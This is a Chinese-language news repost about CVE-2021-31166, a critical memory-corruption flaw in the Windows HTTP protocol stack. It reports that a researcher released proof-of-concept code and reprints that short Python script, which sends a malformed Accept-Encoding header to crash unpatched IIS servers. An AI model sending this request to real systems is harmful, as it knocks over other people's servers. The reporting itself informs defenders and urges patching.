栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 系统运维 > 网络安全 > Web安全

Windows操作系统HTTP协议栈内存破坏漏洞PoC公开

Web安全 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力



 5月微软补丁日修复了一个CVSSv3评分9.8分的严重安全漏洞,该漏洞CVE编号为CVE-2021-31166。近日,有研究人员在GitHub上公布了该漏洞的PoC代码。

CVE-2021-31166漏洞是Windows操作系统中HTTP 协议栈的内存破坏漏洞。该协议栈是Windows内置的IIS 服务器使用的。如果IIS 服务器启用,攻击者就可以发送伪造的包来在操作系统kernel上执行也代码。微软称该漏洞可以被用来创建网络蠕虫,因此建议优先修复。



虽然该漏洞CVSS评分为9.8分,听起来非常危险,但该漏洞只影响最新的一些Windows版本,具体影响Windows 10、Windows server 2004、Windows server 20H2的不同版本。

5月17日,安全研究人员Axel Souchet在GitHub上公开了该漏洞的PoC代码。该PoC代码可以使运行IIS 服务器的未修复的Windows系统奔溃,但是并没有实现蠕虫功能。

PoC代码参见:https://github.com/0vercl0k/CVE-2021-31166

import requests 
  • import argparse   
  •   def main(): 
  •     parser = argparse.ArgumentParser('Poc for CVE-2021-31166: remote UAF in HTTP.sys')     parser.add_argument('--target', required = True) 
  •     args = parser.parse_args()     r = requests.get(f'http://{args.target}/', headers = { 
  •         'Accept-Encoding': 'doar-e, ftw, imo, ,',     }) 
  •     print(r) 
  • PoC视频参见: https://github.com/0vercl0k/CVE-2021-31166/blob/main/pics/trigger.gif

    本文翻译自:https://therecord.media/poc-released-for-wormable-windows-iis-bug/如若转载,请注明原文地址。

     

    转载请注明:文章转载自 www.mshxw.com
    本文地址:https://www.mshxw.com/it/823959.html
    我们一直用心在做
    关于我们 文章归档 网站地图 联系我们

    版权所有 (c)2021-2022 MSHXW.COM

    ICP备案号:晋ICP备2021003244-6号